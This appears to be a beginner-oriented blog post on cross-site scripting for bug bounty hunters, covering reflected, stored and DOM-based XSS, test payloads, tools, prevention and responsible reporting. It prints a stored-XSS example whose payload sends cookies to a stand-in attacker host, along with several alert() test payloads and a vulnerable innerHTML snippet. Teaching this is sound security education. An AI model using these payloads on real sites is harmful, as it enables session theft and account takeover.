Cross-Site Scripting (XSS) is one of the most common and dangerous web vulnerabilities—and one of the first bugs most bug bounty beginners discover.

If you’re learning web application security or starting your journey into bug bounty hunting, understanding XSS is a must. In this post, we’ll explore:

✅ What XSS is
✅ Types of XSS
✅ Real-life examples
✅ How to test for it
✅ How to prevent it
✅ Why it matters in the bug bounty world

Let’s dive in. 🕵️‍♀️




📌 What is XSS?

Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious scripts (usually JavaScript) into web pages that are viewed by other users.

When a website doesn’t properly validate or sanitize user input, an attacker can insert code that runs in the browser of anyone who visits that page.

This means attackers can:

  • Steal cookies or session tokens

  • Redirect users to phishing sites

  • Deface web pages

  • Log keystrokes

  • Interact with browser APIs on behalf of the user

In short: XSS lets an attacker run their code inside someone else’s browser.

🔍 Types of XSS

There are three main types of Cross-Site Scripting you need to understand:

1. ⚡ Reflected XSS

This happens when malicious input is reflected immediately in the web page, typically via a URL parameter.

🧪 Example:

http://example.com/search?q=<script>alert('XSS')</script>

If the server doesn’t sanitize q, the script runs in the victim’s browser.

📌 Found in: search pages, error messages, login redirects

2. 🐛 Stored XSS

In this case, the attacker’s payload is saved on the server (e.g., in a comment, username, or blog post) and then served to users who view that content.

💥 It’s more dangerous than reflected XSS because:

  • It affects multiple users

  • It persists across sessions

🧪 Example:
You post a comment like:

<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>

Now everyone who views that comment will have their cookies stolen.

📌 Found in: comment systems, profile bios, forums

3. 🧬 DOM-Based XSS

This type doesn’t involve the server directly. Instead, the client-side JavaScript dynamically handles user input insecurely.

🧪 Example:

let user = location.hash.substring(1);
document.getElementById("welcome").innerHTML = "Welcome " + user;

URL: http://example.com/#<img src=x onerror=alert(1)>

📌 Found in: single-page apps (SPAs), JavaScript-heavy frontends (React, Angular, etc.)

🧰 How to Test for XSS (Manual & Tools)

Start by trying common payloads in input fields, URLs, or any user-controlled areas.

Basic Test Payloads:

<script>alert('XSS')</script>
<img src=x onerror=alert(1)>
<svg/onload=alert('XSS')>
"><script>alert(1)</script>

Tools for XSS Testing:

  • Burp Suite (with the Repeater and Intruder)

  • XSStrike – XSS fuzzing tool

  • Dalfox – Advanced XSS scanner

  • Google Chrome DevTools – Monitor DOM changes and JavaScript behavior

👨‍💻 Pro Tip: Always look for input that’s reflected, rendered, or used in scripts.

🔐 Real-Life Example of XSS

Case: eBay XSS (Historical)

A researcher found that he could inject a script into eBay’s product listings via SVG elements. Anyone viewing the listing would have the script executed in their browser.

💰 Payout: Several thousand dollars
🛡️ Fix: Input sanitization, CSP headers

🛡️ How to Prevent XSS (For Developers)

Security is a shared responsibility. Here’s how developers can protect their apps:

1. Output Encoding

  • Use proper escaping when displaying user input

  • HTML encode content (e.g., < becomes &lt;)

2. Input Validation

  • Reject dangerous characters at input (especially <, >, ")

3. Content Security Policy (CSP)

  • Set headers that restrict the types of content that can be executed

Content-Security-Policy: default-src 'self'

4. Use Frameworks Safely

  • React, Angular, and Vue have built-in protections, but misuse can still lead to DOM-based XSS.

💰 Why XSS Matters in Bug Bounty

XSS is one of the most commonly reported vulnerabilities in HackerOne, Bugcrowd, and Intigriti.

Why?

  • It’s easy to test for

  • It’s widely misunderstood by developers

  • It often leads to high-impact results like session hijacking or account takeover

💸 Many beginners get their first bug bounty payout from finding a simple reflected or stored XSS.

✅ Quick Checklist for Testing XSS

✅ Find user input fields (search, comments, login, forms)
✅ Inject basic payloads and watch the response
✅ View source code and monitor DOM behavior
✅ Use tools like Burp Suite, XSStrike, Dalfox
✅ Report responsibly with screenshots, reproduction steps, and impact

📚 Bonus: Resources to Learn More

✍️ Final Thoughts

Cross-Site Scripting may sound simple, but it’s still one of the most powerful vulnerabilities in web security. Whether you’re hunting for bugs, learning ethical hacking, or just exploring how websites work, XSS should be one of the first bugs you master.

🎯 Start small, think creatively, and always test responsibly. XSS is a great first step toward your bug bounty success.


#XSS #CrossSiteScripting #BugBountyForBeginners #WebApplicationSecurity #BugBountyTips #EthicalHacking #LearnWebSecurity #OWASPTop10 #ReflectedXSS #StoredXSS #DOMXSS #SecurityResearch #BugBountyIndia #XSSPayloads #XSSPrevention #HackerMindset